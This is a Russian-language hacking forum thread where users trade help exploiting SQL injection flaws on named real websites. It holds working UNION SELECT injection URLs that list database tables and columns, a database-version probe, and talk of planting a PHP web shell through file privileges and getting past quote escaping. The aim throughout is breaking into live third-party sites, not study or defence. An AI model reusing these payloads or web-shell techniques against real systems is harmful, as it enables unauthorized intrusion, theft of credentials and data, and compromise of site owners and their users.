Ваши вопросы по уязвимостям.

Napas

создавай .php файл:

выполняй его, и shell.php будет твой шелл

 

aka PSIH
не катит (
Warning: copy(D:/Web/cms/xek.php) [function.copy]: failed to open stream: Permission denied in D:\Web\cms\jj.php on line 2
можно ли еще что-нибудь сделать в такой ситуации?

 

sabe
Что вы так боитесь подзапросы, один раз разобраться, и всё станет понятно в дальнейшем
Вот пример(точнее один из вариантов), всё просто
Подбираем таблицу:

Далее, вывод значения:

Это незаконченный вывод
Добивать не стал. кому нужно разберутся )

Разумеется скриптами всё будет гораздо быстрее чем вручную

 

В админки есть возможность делать запросы к базе
Помогите составить правильно запрос чтобы закачать файл на сервер.
Сори если не туда.

 

Нашел очередную скулю на сайте какогото импортного хостера:

Подскажите, как раскрутить? И в чем там вообще проблема?

 

Code:

http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+in+'.'

выдает: Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.
кто дальше пробьется?

 

А куда дальше-то? Обычная скуль, MSSQL, отлично крутится всё в порядке, никаких аномалий

http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('tbl_comps','all_tovar','allprice','banner'))--

и т.д

 

я новичек.скажите как достать хеш и чем?

 

http://mirinfo.ru/cat/zapas.aspx?num=1'


скуля?

 

откуда?

 

Руками.

 

Да. Вроде бы )

 

кто раскрутить помогет?

 

Thrasher88
фильтрирует...

F4R
заабей... )

юниона нема? (

иьект у мусаров?

 

почему ошибка?

 

Для начало - там 13 столбцов...

Code:

http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(table_name,0x3a,table_rows),4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

To sabe:

Code:

http://www.hawkingtech.com/downloads.php?file_id=2340+and+substring(version(),1,1)=3

3-я ветка..

 

а как например вывести колонки из IMEI_users ???

 

Вот так.

Code:

http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x494d45495f7573657273--

 

Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!

 

Да, но даже при меджик квотс = он можно выкрутиться, вот смотри: https://forum.antichat.ru/showpost.php?p=663815&postcount=39

Меня это спасало не один раз, да и имея возможность читать сорцы сайта, можно найти ещё какую-нидь уязвимость или туже "двойную скулю", но в другом скрипте.